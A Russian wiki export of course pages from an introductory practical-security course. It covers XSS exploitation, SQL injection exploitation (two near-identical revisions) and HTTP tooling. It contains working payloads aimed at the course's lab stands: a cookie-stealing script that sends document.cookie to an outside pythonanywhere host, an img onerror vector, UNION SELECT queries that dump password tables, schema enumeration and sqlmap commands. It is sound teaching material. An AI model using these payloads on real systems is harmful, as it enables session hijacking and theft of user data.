и в предыдущем сценарии с CSRF, убедить жертву перейти по переданной ссылке (или зайти на контроллируемый атакующим сайт что в данном случае равноценно т.к. можно сделать <code>iframe</code> или редирект), то атакующий сможет получит доступ и украсть любые данные, доступные жертве.

=== Эксплуатация XSS ===

Конкретнее, атакующий может
* получить '''cookie''' через свойство <code>document.cookie</code>. По-умолчанию JavaScript-код может считывать значения кук и менять их. Это протейший способ эксплуатации XSS, после кражи сессионного идентификатора атакующий может просто уже самостоятельно делать запросы, передавая его в заголовке <code>Cookie</code>, сайт будет воспринимать эти запросы как пришедшие от пользователя-жертвы, так что дальше атакующий сможет получить доступ ко всем данным жетвы, просто запрашивая их. Чтение куки из JS-кода можно запретить, выставив атрибут куки <code>HttpOnly</code> ([https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#Secure_and_HttpOnly_cookies MDN], [https://www.owasp.org/index.php/HttpOnly OWASP]), он выставляется вместе с кукой в заголовке ответа <code>Set-Cookie: session=eyJ1c2VyIjoibGlsIiwidXNlcl9pZCI6M30.XI9rjw.-tX3LIQ-cwyUnNlOuQqyVXBu99A; HttpOnly; Path=/</code>. Проверить, сработает ли кража куки можно, залогинившись и обратившись к <code>document.cookie</code> (в браузерной консоли или по-другому из JS кода). Например, можно будучи залогиненым перейти по урлу http://pwnitter.stands.course.secsem.ru/registration-complete?name=%3cscript%3ealert('STOLENCOOKIE:+'+%2b+document.cookie);%3c/script%3e (обратите внимание, что тут плюс (<code>+</code>) закодирован URL-кодированием и выглядит как <code>%2b</code> - без этого он по правилам URL-кодирования превратился бы в пробел.
* читать (и изменять) страницу, на которой выполняется JS-код. JavaScript-код может произвольным образом манипулировать страницей, используя интерфейс '''Document Object Model''' ('''DOM''', [https://en.wikipedia.org/wiki/Document_Object_Model википедия], [https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model MDN]). К примеру, весь HTML-код страницы можно считать таким кодом <code>var wholePage = document.documentElement.outerHTML;</code>
* делать HTTP-запросы к сайту и читать ответы на них, используя '''XMLHttpRequest''' и '''fetch'''
* выводить считанные данные '''на сервер атакующего'''. Как уже обсуждалось выше, JS-код на странице '''может''' делать запросы к другим сайтам (по умолчанию читать ответы не получится, но, во-первых, для вывода украденных данных достаточно сделать запрос, во-вторых, в крайнем случае атакующий может включить на своём cервере '''CORS''').
** Для отправки запроса, содержащего украденные данные, можно использовать XMLHttpRequest/fetch
** есть еще более простой трюк - создать в JS-коде изображение с URL, хостом которого будет сервер атакующего, а в пути или query string будут украденные данные. При попытке загрузить изображение по этому URL браузер отправит запрос, включающий украденные данные, атакующий увидит его, скажем, в логах своего сервера. Например, такой код <code>var i = new Image;var stolenCookie = document.cookie; i.src = 'https://utkautkautkautkautka.pythonanywhere.com/stolen?data=' + stolenCookie</code> приведёт к тому что браузер откроет URL https://utkautkautkautkautka.pythonanywhere.com/stolen?data=session=eyJ1c2VyIjoibGlsIiwidXNlcl9pZCI6M30.D3EBFA.F9g-ANJQvCGlewtSVEbYIYfyLXk и а логах этого сервера появится запись <code>"GET /stolen?data=session=eyJ1c2VyIjoibGlsIiwidXNlcl9pZCI6M30.D3EBFA.F9g-ANJQvCGlewtSVEbYIYfyLXk HTTP/1.1" 404</code>, содержащая украденную куку.
** При выводе данных атакующему может помогать кодировать данные (чтобы, скажем, они не образались по какому-нибудь символу-разделителю). Очень полезна функция <code>btoa</code>, которая кодирует строку в '''base64'''. Другим вариантом может быть URL-кодирование (<code>encodeURIComponent</code>).

=== Stored XSS ===

'''Stored XSS''' (или XSS типа 2) имеет место, когда атакующий JS-код '''сохраняется на сервере''' и возвращается не в ответ на запрос, передающий этот код (или не только на него), но и на другие запросы, уже не содержащие атаку. На стенде http://pwnitter.stands.course.secsem.ru/ примером stored XSS является XSS в личных сообщениях. Текст личного сообщения никак не фильтруется и подставляется в страницу входящих сообщений as-is, что позволяет внедрить произвольный JS-код. Stored XSS намного опаснее, т. к., во-первых, вредоносный код сохраняется на сервере и может отработать несколько раз без дополнительных действий со стороны атакующего, во-вторых, жетва не должна как-то "подыгрывать" атакующему, переходя по подозрительным ссылкам или заходя на недоверенные сайты; жетва может делать вполне обычные действия, посещая вполне легитимные страницы сайта (в данном случае - простматривая личные сообщения) и при этом подвергнуться атаке.

=== DOM-based XSS ===

'''DOM-based XSS''' ('''DOMXSS''' или XSS типа 3) - XSS, вызванная действиями клиентского JS-кода, а не сервера. JavaScript-код может произвольным образом менять сожержимое страницы, в т. ч. добавить на неё новый скрипт, что может привести к его выполнению. Кроме того, у JavaScript есть ряд способов непосредственно выполнить новый JS-код (<code>eval</code>,<code>Function</code> и не только). В итоге, ошибка в клиентском коде (в простейшем случае - опять же, подстановка пользовательских данных на страницу без должной фильтрации) может приводить к XSS, при этом вредоносный код может даже не отправляться на сервер и атака может пройти для сервера полностью незамеченной. Примером DOMXSS на стенде http://pwnitter.stands.course.secsem.ru/ является XSS в "твитах". Они грузятся с сервера асинхронно JS-кодом (с помощью XMLHttpRequest) и помещаются в код страницы через присваивания свойства <code>innerHTML</code> ([https://developer.mozilla.org/en-US/docs/Web/API/Element/innerHTML MDN]). Никакой фильтрации опять-таки не производится, что позволяет внедрить на страницу разметку. Что интересно, код в теге <code>script</code> при этом не выполнится - он не выполняется автоматически при добавке <code>script</code> через <code>innerHTML</code>. Однако, здесь может сработать другой, более универсальный вектор - обработчик события. Одним из наиболее часто используемых векторов атаки является тег <code>img</code> с невалидным урлом и обработчиком ошибки: <code><img src=invalidsource onerror="alert('XSS')"></code>. В принципе, DOMXSS тоже можно классифицировать как Reflected и Stored, в зависимости от того, берет ли уязвимый клиентский код атакующие данные из запроса клиента или же они где-то сохранены. В данном случае, скорее, Stored, так как "твит" сохранится на сервере и будет отдаваться в списке, что приведет к атаки на любых пользователей, которые, скажем, зашли посмотреть список рандомных твитов.

=== XSS vs CSRF ===

Хорошим тестом на понимание является ответ на вопрос - что сильнее, XSS или CSRF и нужно ли искать/может ли быть полезным CSRF если уже удаётся эксплуатировать на сайте XSS.

Введение в практическую безопасность (2019)/Эксплуатация SQL injection

2022-07-04T13:02:58Z

Asterite: /* UNION SELECT */

Краткое введение в то что такое SQL injection было в [[Введение_в_практическую_безопасность_(2019)/HTTP,_инструменты_%26_SQL_injection#SQL_injection|предыдущей статье]], теперь о некоторых вещах которые может делать атакующий.

=== SQL-комментарий ===

Супер простой трюк. В конце своей инъекции можно добавить символы однострочного SQL-комментария, тогда всё что идет дальше (как правило, остаток исходного SQL-запроса) будет считаться комментарием и проигнорируется. В разных БД символы комментария могут разными, см. документацию, чаще всего это двойной минус <code>--</code> и/или решетка <code>#</code>, также бывает классический двойной слеш <code>//</code>. Фактически, этот трюк уже был использован в примере в [[Введение_в_практическую_безопасность_(2019)/HTTP,_инструменты_%26_SQL_injection#SQL_injection|предыдущей статье]], двойной минус в конце там заставил базу данных проигнорировать оставшуюся от исходного запроса одинарную кавычку в конце.

=== UNION SELECT ===

Очень полезным может быть <code>UNION</code> ([https://ru.wikipedia.org/wiki/Union_(SQL) вики],[https://www.postgresql.org/docs/9.4/typeconv-union-case.html доки postgres],[http://citforum.ru/database/sql_kg/3-4.shtml курс "Основы современных БД"]), который позволяет присоединить к результу одного <code>SELECT</code> запроса результат еще одного. Если инъекция в операторе <code>SELECT</code> (что в реальности довольно часто), с помощью <code>UNION</code> можно добавить в его результат вывод нового, полностью написанного атакующим <code>SELECT</code> - запроса из друой таблицы, с другими колонками, условиями и т. д.

Чтобы <code>UNION</code> сработал, требуется чтобы количество и типы колонок совпадали. Помочь с этим может то что в SQL можно писать на месте колонок просто константы (и тогда они просто проставятся на эти места в каждой из строк результата запроса) и то что чаще всего можно использовать вместо любого значения <code>NULL</code>. Если количество колонок в исходном запросе неизвестно, можно просто подбирать его.

Для такого кода

[[Файл:Sqli-code.png|650px]]

если параметр <code>login</code> будет иметь значение <code>admin' UNION SELECT * FROM webapp.users WHERE login = 'Kobzon' #</code> результирующий запрос примет вид
[[Файл:Union-triv.png|770px]]

Этот запрос "достанет" из базы данных две записи - соответствующие пользователям "admin" и "Kobzon". Это можно попробовать на стенде: http://sql1.stands.course.secsem.ru/by-login?login=admin'+UNION+SELECT+*+FROM+webapp.users+WHERE+login+=+'Kobzon'+%23
Обратите внимание что решетка закодирована '''URL-кодированием''' ([https://en.wikipedia.org/wiki/Percent-encoding вики]) и выглядит как <code>%23</code>. В данном случае это необходимо, т. к. решетка в URL имеет специальное значение - отделяет '''хеш урла''' ([https://en.wikipedia.org/wiki/Fragment_identifier вики]), который не посылается на сервер вообще (как и сама решетка). То есть если её не закодировать то по неё URL просто обрежется.

Конечно, пример тривиальный, так как мы получаем те же колонки из той же таблицы, это можно было бы сделать и без <code>UNION</code>. Вот более интересный пример: если значение <code>login</code> будет <code>admin' UNION SELECT id,password,NULL,NULL,NULL FROM webapp.passwords WHERE id >= 2 #</code> то результирующий SQL-запрос примет вид

[[Файл:Union-p4ssww0rdz.png|900px]]

И в его результат попадут пароли всех пользователей с <code>id</code> начиная с 2. На стенде: http://sql1.stands.course.secsem.ru/by-login?login=admin'+UNION+SELECT+id,password,NULL,NULL,NULL+FROM+webapp.passwords+WHERE+id+%3e%3d+2+%23 (символ <code>></code> здесь также URL-закодирован).
Здесь <code>NULL</code> "забивает" лишние колонки, то что их нужно было именно 3 можно понять из схемы данных ([https://course.secsem.ru/task-src/sql1.tgz код стенда выложен]), там в таблице <code>users</code> 5 колонок, также это можно было получить подбором.

Еще при использовании <code>UNION</code> бывает проблема что код приложения отдаёт не все строки результата, а только часть, например только первую (так обычно бывает когда разработчик предполагал что запрос вернет только одну строку). В этом случае можно просто сделать невыполнимое условие в <code>WHERE</code> исходного запроса - тогда он вернёт 0 строк и в выдачу попадёт строка из присоединенного <code>SELECT</code>'а. Например <code>nonexistent' and 1=0 UNION SELECT id,password,NULL,NULL,NULL FROM webapp.passwords WHERE id >= 2 #</code>.

=== Метаданные ===

Как правило, при эксплуатации SQL injection мешает то что неизвестны имена таблиц, имена и типы колонок. Может помочь то что в современных базах данных как правило есть специальные таблицы с метаданными, которые содержат всю схему данных базы. У разных СУБД эти таблицы называются и устроены по-разному, про их устройство можно почитать в документации. Например, у MySQL таблицы с метаданными хранятся в базе <code>INFORMATION_SCHEMA</code>([https://dev.mysql.com/doc/refman/8.0/en/information-schema.html документация]) - информация о существующих базах данных лежит в таблице <code>SCHEMATA</code>, о таблицах - в <code>TABLES</code>, о колонках - в <code>COLUMNS</code> и так далее.

C таким payload <code>nonexistent' and 1=0 UNION SELECT 0,SCHEMA_NAME,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA #</code> можно получить список всех существующих баз данных (http://sql1.stands.course.secsem.ru/by-login?login=nonexistent'+and+1=0+UNION+SELECT+0,SCHEMA_NAME,NULL,NULL,NULL+FROM+INFORMATION_SCHEMA.SCHEMATA+%23), с таким <code>nonexistent' and 1=0 UNION SELECT 0,concat(concat(table_name, ' '),column_name),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = 'webapp' #</code> - список всех таблиц с названиями колонок в БД <code>webapp</code> (http://sql1.stands.course.secsem.ru/by-login?login=nonexistent'+and+1=0+UNION+SELECT+0,concat(concat(table_name,+'+'),column_name),NULL,NULL,NULL+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA+=+'webapp'+%23 ). В этом последнем запросе использована ещё одна довольно полезная штука - функция SQL, в данном случае функция MySQL '''CONCAT''' ([https://dev.mysql.com/doc/refman/8.0/en/string-functions.html#function_concat документация]).

=== Fingerprinting базы данных ===

Для атаки бывает необходимо понимать, какая именно СУБД используется - чтобы понимать, как называются таблицы с метаданными какие функции/механизмы/особенности БД можно использовать и т. д. Если из других источников (скажем, доступных исходных кодов приложения или вывода приложением подробной информации о себе) узнать, какая СУБД, не удаётся, это можно узнать от неё самой. Во-первых, если выдаются SQL-ошибки, часто по виду ошибки, который обычно содержит числовой идентификатор, можно однозначно определить базу. Если даже ошибки не выводятся, зафингерпринтить базу можно по её реакции на конструкции SQL, которые работают только в некоторых базах или работают в разных БД по-разному. Яркими примерами является то что в MySQL можно в качестве строковой колонки указать переменную <code>@@version</code> и функцию <code>version()</code> и на её место в обоих случаях подставится версия базы, в PostgreSQL и SQLite оператор <code>||</code> работает как оператор конкатенации строк, при этом в PostgreSQL поддерживается база <code>information_schema</code>, а в SQLite - нет. Почитать про database fingerprinting можно [https://www.owasp.org/index.php/OWASP_Backend_Security_Project_DBMS_Fingerprint на OWASP], [https://null-byte.wonderhowto.com/how-to/sql-injection-101-fingerprint-databases-perform-general-reconnaissance-for-more-successful-attack-0184562/ здесь], и еще много где, это довольно легко гуглится.

=== Error-based вывод ===

В случае, если мы в ответ сервера не выводятся данные, полученные из SQL-запроса, но выводятся ошибки, вытаскивать информацию бывает всё равно можно - через сообщения об ошибке. Про это написано [https://intsystem.org/security/error-based-sql-injection-in-mysql/ в этой статье], [https://xakep.ru/2010/05/27/52222/ ещё этой], [https://habr.com/ru/post/235287/ этой] и еще много где.

Кстати, если даже не выводится ошибка, а есть только бинарный признак (приложение даёт в зависимости от полученных из SQL-запроса данных ответ да/нет) и даже если нет и его вытягивать данные всё равно можно. Как именно - задача на подумать или нагуглить -).

=== Stacked queries ===

Иногда бывает можно в одном запросе от приложения к базе данных передать несколько SQL-запросов через <code>;</code>. В этом случае SQL injection позволяет сделать уже вообще любой SQL-запрос. Доступность stacked queries зависит от БД и используемого драйвера, к примеру c базами '''sqlite3''' и '''MySQL''' обычно нельзя, с базой '''PostgreSQL''' и стандартным питоновским драйвером '''psycopg2''' - можно.

=== Изменения в БД ===

Часто клиентские библиотеки для баз данных (драйверы) при выполнении SQL-запроса автоматически начинают новую транзакцию (выполняя оператор <code>BEGIN</code>). Любые изменения, сделанные SQL-запросом в транзакции, не будут видны за пределами текущей транзакции, пока она не будет успешно завершена (оператором <code>COMMIT</code>). Однако, если программист делал запрос, достающий что-то из базы, то есть <code>SELECT</code>, ему не нужно применять никакие изменения и вполне возможно он не делал <code>COMMIT</code> после своего запроса - поэтому, даже если вставить какой то изменяющий базу запрос после селекта, он не повлияет на ее состояние, так как не будет подтверждена транзакция. ([http://initd.org/psycopg/docs/connection.html#connection.commit Про то как это работает в доках psycopg2], см. про функции '''commit''' и '''close'''). Однако, эту проблему можно (по крайней мере в некоторых случаях) победить - если работают stacked queries, можно просто вставить после своего запроса оператор <code>COMMIT</code>, и это приведет к подтверждению транзакции (<code>SELECT ... WHERE ... ; INSERT INTO ... ; COMMIT; --</code>).

=== sqlmap ===

Существует ряд инструментов которые умеют обнаруживать и/или эксплуатировать SQL injection. Главный из них - '''[https://github.com/sqlmapproject/sqlmap sqlmap]'''. Это тулза напитоне, которая умеет брать запрос к сайту и подставлять в значения его параметров разные атаки на SQLi. Как им пользоваться отлично описано в их [https://github.com/sqlmapproject/sqlmap/wiki/Usage usage], базовое использование - передача sqlmap'у урла через параметр <code>-u</code> (этого достаточно если уязвимый параметр в URL и можно эксплуатировать GET-запросом) <pre>python sqlmap.py -u http://sql1.stands.course.secsem.ru/by-login?login=admin</pre> либо файла с HTTP-запросом через <code>-r</code> (это может понадобиться если уязвим параметр, передаваемый в теле POST-запроса или, скажем, HTTP-заголовке) <pre>python sqlmap.py -r request.txt</pre> где в <code>request.txt</code> записан HTTP-запрос, например
<pre>GET /by-login?login=admin HTTP/1.1
Host: sql1.stands.course.secsem.ru
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

</pre>
Одна вещь, которую надо помнить про sqlmap это то что он может '''кэшировать''' результаты запросов, так что если в базе что-то обновилось (или вы получили при прошлом запуске неполные данные), повторный запуск может выдавать (устаревшие) данные из кэша, а не взаимодействовать с уязвимым приложением для получения новых. Чтобы сделать запрос в обход кэша можно использовать флаг <code>[https://github.com/sqlmapproject/sqlmap/wiki/Usage#ignore-query-results-stored-in-session-file --fresh-queries]</code>, также можно очистить кэш с помощью флага <code>[https://github.com/sqlmapproject/sqlmap/wiki/Usage#flush-session-files --flush-session]</code>.

=== Еще материалы ===

Это уже писалось в прошлой статье, но отличая дока по SQL injection [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 есть на форуме rdot].

Введение в практическую безопасность (2019)/Эксплуатация SQL injection

2022-07-04T13:01:08Z

Asterite:

Краткое введение в то что такое SQL injection было в [[Введение_в_практическую_безопасность_(2019)/HTTP,_инструменты_%26_SQL_injection#SQL_injection|предыдущей статье]], теперь о некоторых вещах которые может делать атакующий.

=== SQL-комментарий ===

Супер простой трюк. В конце своей инъекции можно добавить символы однострочного SQL-комментария, тогда всё что идет дальше (как правило, остаток исходного SQL-запроса) будет считаться комментарием и проигнорируется. В разных БД символы комментария могут разными, см. документацию, чаще всего это двойной минус <code>--</code> и/или решетка <code>#</code>, также бывает классический двойной слеш <code>//</code>. Фактически, этот трюк уже был использован в примере в [[Введение_в_практическую_безопасность_(2019)/HTTP,_инструменты_%26_SQL_injection#SQL_injection|предыдущей статье]], двойной минус в конце там заставил базу данных проигнорировать оставшуюся от исходного запроса одинарную кавычку в конце.

=== UNION SELECT ===

Очень полезным может быть <code>UNION</code> ([https://ru.wikipedia.org/wiki/Union_(SQL) вики],[https://www.postgresql.org/docs/9.4/typeconv-union-case.html доки postgres],[http://citforum.ru/database/sql_kg/3-4.shtml курс "Основы современных БД"]), который позволяет присоединить к результу одного <code>SELECT</code> запроса результат еще одного. Если инъекция в операторе <code>SELECT</code> (что в реальности довольно часто), с помощью <code>UNION</code> можно добавить в его результат вывод нового, полностью написанного атакующим <code>SELECT</code> - запроса из друой таблицы, с другими колонками, условиями и т. д.

Чтобы <code>UNION</code> сработал, требуется чтобы количество и типы колонок совпадали. Помочь с этим может то что в SQL можно писать на месте колонок просто константы (и тогда они просто проставятся на эти места в каждой из строк результата запроса) и то что чаще всего можно использовать вместо любого значения <code>NULL</code>. Если количество колонок в исходном запросе неизвестно, можно просто подбирать его.

Для такого кода

[[Файл:Sqli-code.png|650px]]

если параметр <code>login</code> будет иметь значение <code>admin' UNION SELECT * FROM webapp.users WHERE login = 'Kobzon' #</code> результирующий запрос примет вид
[[Файл:Union-triv.png|770px]]

Этот запрос "достанет" из базы данных две записи - соответствующие пользователям "admin" и "Kobzon". Это можно попробовать на стенде: http://sql1.stands.course.secsem.ru/by-login?login=admin'+UNION+SELECT+*+FROM+webapp.users+WHERE+login+=+'Kobzon'+%23
Обратите внимание что решетка закодирована '''URL-кодированием''' ([https://en.wikipedia.org/wiki/Percent-encoding вики]) и выглядит как <code>%23</code>. В данном случае это необходимо, т. к. решетка в URL имеет специальное значение - отделяет '''хеш урла''' ([https://en.wikipedia.org/wiki/Fragment_identifier вики]), который не посылается на сервер вообще (как и сама решетка). То есть если её не закодировать то по неё URL просто обрежется.

Конечно, пример тривиальный, так как мы получаем те же колонки из той же таблицы, это можно было бы сделать и без <code>UNION</code>. Вот более интересный пример: если значение <code>login</code> будет <code>admin' UNION SELECT id,password,NULL,NULL,NULL FROM p4ssww0rdz WHERE id >= 2 #</code> то результирующий SQL-запрос примет вид

[[Файл:Union-p4ssww0rdz.png|900px]]

И в его результат попадут пароли всех пользователей с <code>id</code> начиная с 2. На стенде: http://sql1.stands.course.secsem.ru/by-login?login=admin'+UNION+SELECT+id,password,NULL,NULL,NULL+FROM+p4ssww0rdz+WHERE+id+%3e%3d+2+%23 (символ <code>></code> здесь также URL-закодирован).
Здесь <code>NULL</code> "забивает" лишние колонки, то что их нужно было именно 3 можно понять из схемы данных ([https://course.secsem.ru/task-src/sql1.tgz код стенда выложен]), там в таблице <code>users</code> 5 колонок, также это можно было получить подбором.

Еще при использовании <code>UNION</code> бывает проблема что код приложения отдаёт не все строки результата, а только часть, например только первую (так обычно бывает когда разработчик предполагал что запрос вернет только одну строку). В этом случае можно просто сделать невыполнимое условие в <code>WHERE</code> исходного запроса - тогда он вернёт 0 строк и в выдачу попадёт строка из присоединенного <code>SELECT</code>'а. Например <code>nonexistent' and 1=0 UNION SELECT id,password,NULL,NULL,NULL FROM p4ssww0rdz WHERE id >= 2 #</code>.

=== Метаданные ===

Как правило, при эксплуатации SQL injection мешает то что неизвестны имена таблиц, имена и типы колонок. Может помочь то что в современных базах данных как правило есть специальные таблицы с метаданными, которые содержат всю схему данных базы. У разных СУБД эти таблицы называются и устроены по-разному, про их устройство можно почитать в документации. Например, у MySQL таблицы с метаданными хранятся в базе <code>INFORMATION_SCHEMA</code>([https://dev.mysql.com/doc/refman/8.0/en/information-schema.html документация]) - информация о существующих базах данных лежит в таблице <code>SCHEMATA</code>, о таблицах - в <code>TABLES</code>, о колонках - в <code>COLUMNS</code> и так далее.

C таким payload <code>nonexistent' and 1=0 UNION SELECT 0,SCHEMA_NAME,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA #</code> можно получить список всех существующих баз данных (http://sql1.stands.course.secsem.ru/by-login?login=nonexistent'+and+1=0+UNION+SELECT+0,SCHEMA_NAME,NULL,NULL,NULL+FROM+INFORMATION_SCHEMA.SCHEMATA+%23), с таким <code>nonexistent' and 1=0 UNION SELECT 0,concat(concat(table_name, ' '),column_name),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = 'webapp' #</code> - список всех таблиц с названиями колонок в БД <code>webapp</code> (http://sql1.stands.course.secsem.ru/by-login?login=nonexistent'+and+1=0+UNION+SELECT+0,concat(concat(table_name,+'+'),column_name),NULL,NULL,NULL+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA+=+'webapp'+%23 ). В этом последнем запросе использована ещё одна довольно полезная штука - функция SQL, в данном случае функция MySQL '''CONCAT''' ([https://dev.mysql.com/doc/refman/8.0/en/string-functions.html#function_concat документация]).

=== Fingerprinting базы данных ===

Для атаки бывает необходимо понимать, какая именно СУБД используется - чтобы понимать, как называются таблицы с метаданными какие функции/механизмы/особенности БД можно использовать и т. д. Если из других источников (скажем, доступных исходных кодов приложения или вывода приложением подробной информации о себе) узнать, какая СУБД, не удаётся, это можно узнать от неё самой. Во-первых, если выдаются SQL-ошибки, часто по виду ошибки, который обычно содержит числовой идентификатор, можно однозначно определить базу. Если даже ошибки не выводятся, зафингерпринтить базу можно по её реакции на конструкции SQL, которые работают только в некоторых базах или работают в разных БД по-разному. Яркими примерами является то что в MySQL можно в качестве строковой колонки указать переменную <code>@@version</code> и функцию <code>version()</code> и на её место в обоих случаях подставится версия базы, в PostgreSQL и SQLite оператор <code>||</code> работает как оператор конкатенации строк, при этом в PostgreSQL поддерживается база <code>information_schema</code>, а в SQLite - нет. Почитать про database fingerprinting можно [https://www.owasp.org/index.php/OWASP_Backend_Security_Project_DBMS_Fingerprint на OWASP], [https://null-byte.wonderhowto.com/how-to/sql-injection-101-fingerprint-databases-perform-general-reconnaissance-for-more-successful-attack-0184562/ здесь], и еще много где, это довольно легко гуглится.

=== Error-based вывод ===

В случае, если мы в ответ сервера не выводятся данные, полученные из SQL-запроса, но выводятся ошибки, вытаскивать информацию бывает всё равно можно - через сообщения об ошибке. Про это написано [https://intsystem.org/security/error-based-sql-injection-in-mysql/ в этой статье], [https://xakep.ru/2010/05/27/52222/ ещё этой], [https://habr.com/ru/post/235287/ этой] и еще много где.

Кстати, если даже не выводится ошибка, а есть только бинарный признак (приложение даёт в зависимости от полученных из SQL-запроса данных ответ да/нет) и даже если нет и его вытягивать данные всё равно можно. Как именно - задача на подумать или нагуглить -).

=== Stacked queries ===

Иногда бывает можно в одном запросе от приложения к базе данных передать несколько SQL-запросов через <code>;</code>. В этом случае SQL injection позволяет сделать уже вообще любой SQL-запрос. Доступность stacked queries зависит от БД и используемого драйвера, к примеру c базами '''sqlite3''' и '''MySQL''' обычно нельзя, с базой '''PostgreSQL''' и стандартным питоновским драйвером '''psycopg2''' - можно.

=== Изменения в БД ===

Часто клиентские библиотеки для баз данных (драйверы) при выполнении SQL-запроса автоматически начинают новую транзакцию (выполняя оператор <code>BEGIN</code>). Любые изменения, сделанные SQL-запросом в транзакции, не будут видны за пределами текущей транзакции, пока она не будет успешно завершена (оператором <code>COMMIT</code>). Однако, если программист делал запрос, достающий что-то из базы, то есть <code>SELECT</code>, ему не нужно применять никакие изменения и вполне возможно он не делал <code>COMMIT</code> после своего запроса - поэтому, даже если вставить какой то изменяющий базу запрос после селекта, он не повлияет на ее состояние, так как не будет подтверждена транзакция. ([http://initd.org/psycopg/docs/connection.html#connection.commit Про то как это работает в доках psycopg2], см. про функции '''commit''' и '''close'''). Однако, эту проблему можно (по крайней мере в некоторых случаях) победить - если работают stacked queries, можно просто вставить после своего запроса оператор <code>COMMIT</code>, и это приведет к подтверждению транзакции (<code>SELECT ... WHERE ... ; INSERT INTO ... ; COMMIT; --</code>).

=== sqlmap ===

Существует ряд инструментов которые умеют обнаруживать и/или эксплуатировать SQL injection. Главный из них - '''[https://github.com/sqlmapproject/sqlmap sqlmap]'''. Это тулза напитоне, которая умеет брать запрос к сайту и подставлять в значения его параметров разные атаки на SQLi. Как им пользоваться отлично описано в их [https://github.com/sqlmapproject/sqlmap/wiki/Usage usage], базовое использование - передача sqlmap'у урла через параметр <code>-u</code> (этого достаточно если уязвимый параметр в URL и можно эксплуатировать GET-запросом) <pre>python sqlmap.py -u http://sql1.stands.course.secsem.ru/by-login?login=admin</pre> либо файла с HTTP-запросом через <code>-r</code> (это может понадобиться если уязвим параметр, передаваемый в теле POST-запроса или, скажем, HTTP-заголовке) <pre>python sqlmap.py -r request.txt</pre> где в <code>request.txt</code> записан HTTP-запрос, например
<pre>GET /by-login?login=admin HTTP/1.1
Host: sql1.stands.course.secsem.ru
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

</pre>
Одна вещь, которую надо помнить про sqlmap это то что он может '''кэшировать''' результаты запросов, так что если в базе что-то обновилось (или вы получили при прошлом запуске неполные данные), повторный запуск может выдавать (устаревшие) данные из кэша, а не взаимодействовать с уязвимым приложением для получения новых. Чтобы сделать запрос в обход кэша можно использовать флаг <code>[https://github.com/sqlmapproject/sqlmap/wiki/Usage#ignore-query-results-stored-in-session-file --fresh-queries]</code>, также можно очистить кэш с помощью флага <code>[https://github.com/sqlmapproject/sqlmap/wiki/Usage#flush-session-files --flush-session]</code>.

=== Еще материалы ===

Это уже писалось в прошлой статье, но отличая дока по SQL injection [https://rdot.org/forum/showthread.php?s=f4292383c9896b773bd98d827eb9411f&t=124 есть на форуме rdot].

Введение в практическую безопасность (2019)/HTTP, инструменты & SQL injection

2022-06-30T17:35:37Z

Asterite: /* SQL injection */

__NOTOC__
== HTTP ==

Клиенты (например, веб-браузеры) взаимодействуют с веб-приложениями по протоколу '''HTTP''' ([https://ru.wikipedia.org/wiki/HTTP википедия], стандарт HTTP 1.1: [https://tools.ietf.org/html/rfc2616 RFC 2616], [https://tools.ietf.org/html/rfc7230 RFC 7230], [https://tools.ietf.org/html/rfc7231 RFC 7231]). Он работает поверх [https://ru.wikipedia.org/wiki/Transmission_Control_Protocol TCP], стандартный TCP-порт для HTTP это порт '''80''', а для HTTPS (HTTP поверх SSL, т. е. с шифрованием) это порт '''443'''. Протокол состоит из запросов (которые клиент отправляет серверу) и ответов (которые сервер присылает в ответ). Протокол HTTP версии 1.1 (наиболее используемой в данный момент) и более ранних - текстовый, то есть сообщения этого протокола человекочитаемые. К примеру, вот запрос, который сделает браузер при переходе по URL http://sql1.stands.course.secsem.ru/users:<br>[[Файл:Http-req-annot.png]] <br>Ответ сервера на него:<br>[[Файл:Http-res-annot.png]]<br>Ещё пример, запрос, который сделает браузер при попытке (неудачной) залогиниться на сайте vk.com c почтой "admin@adminmail.ru" и паролем "adminpassword":<br>[[Файл:Http-req-post-annot.png]]<br>Ответ сервера на этот запрос<br>[[Файл:Http-res-post-annot.png]]

Еще информация: про основы веб-технологий <s>[http://old.secsem.ru/lections?action=AttachFile&do=get&target=infosec-network2013-4-%D0%9E%D1%81%D0%BD%D0%BE%D0%B2%D1%8B+%D0%B2%D0%B5%D0%B1-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B9.pdf в слайдах нашего спецкурса 2013 года]</s> [https://www.youtube.com/watch?v=drpCqzSpvq4 в видео лекции Андрея Петухова на нашем спецкурсе 2013 года].

== Инструменты ==

=== Burp Suite ===

Для анализа HTTP-взаимодействия между клиентом и сервером, а также для вмешательства в него удобен '''Burp Suite'''. Он может работать как HTTP-proxy, то есть получать от клиента запрос и пересылать его серверу, получать ответ сервера и передавать его клиенту. При этом Burp может показывать запросы и ответы пользователю, задерживать и изменять их. Кроме этого, он может формировать и отправлять новые HTTP-запросы сам ("вручную"). [https://portswigger.net/burp/documentation/desktop/getting-started Здесь написано как его скачать и начать использовать].

=== Netcat и curl ===

Более простые инструменты, позволяющие отправлять HTTP-запросы веб-приложению и получать ответы - '''netcat''' и '''curl'''.

